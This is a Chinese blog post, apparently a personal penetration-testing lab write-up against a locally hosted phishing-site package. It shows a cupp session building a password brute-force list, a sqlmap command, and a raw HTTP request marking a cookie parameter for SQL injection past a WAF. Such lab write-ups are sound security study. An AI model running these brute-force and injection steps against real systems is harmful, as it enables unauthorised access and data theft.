渗透测试系列-本地一-web测试-2018钓鱼网站源码测试

  • by

打算以本地两个+实际两个,共四个渗透实例进行练习,把手法与以前以及现在遇到的细节问题一一解决

本地一 web测试+内网测试
本地二 web测试 10余种web漏洞经典poc
实际一 web测试 (中低)
实际二 web+内网测试 (较低)

本文是本地一的web测试进行复现,以2018钓鱼网站源码测试模拟

设置后台登陆密码kongjian2018

一.后台无验证码,爆破

1.cewl爬取生成密码(kali自带 相关库原因,没法用)

2.cupp工具使用(可以参考)

可以看到,没有生成正确的密码,但也相当不错了

root@kali:~/shentou# git clone https://github.com/Mebus/cupp.git
正克隆到 'cupp'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 194 (delta 1), reused 1 (delta 0), pack-reused 188
接收对象中: 100% (194/194), 109.18 KiB | 178.00 KiB/s, 完成.
处理 delta 中: 100% (100/100), 完成.
root@kali:~/shentou# cd cupp/
root@kali:~/shentou/cupp# ls
CHANGELOG.md cupp.cfg cupp.py LICENSE README.md test_cupp.py
root@kali:~/shentou/cupp# ./cupp.py -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: kong
> Surname: jian
> Nickname:
> Birthdate (DDMMYYYY): 19900902


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]: n
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]:n
> Leet mode? (i.e. leet = 1337) Y/[N]: y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to kong.txt, counting 4960 words.
[+] Now load your pistolero with kong.txt and shoot! Good luck!

二.看下源码

1.

可以看到common.php包含360的防护代码(这里是没有看到怎么绕过去的,上次遇到的绕过安全狗,有需要可以参考个人的这篇:http://www.naivete.online/%e5%ae%89%e5%85%a8%e7%8b%97%e7%9a%84sql-fuzz/)

2.

找到member.php,发现没有包含360waf.php,cookies的几个参数又带入了数据库查询,存在注入

直接sqlmap -r 1.txt –batch –dbs –dbms=mysql –level=3即可

1.txt

POST /20190916/admin/login.php HTTP/1.1
Host: 192.168.142.129
Content-Length: 29
Cache-Control: max-age=0
Origin: http://192.168.142.129
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.142.129/20190916/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=af68khqaaji7drd6fpkkkr06d6;islogin=123;admin_user=*
Connection: close

user=admin&pass=admin&submit=

3.

很蛋疼的是 sql注入了后,没有什么利用点了,几个不过360waf的功能文件都只有sql的功能

2019.9.16

发表评论

电子邮件地址不会被公开。 必填项已用*标注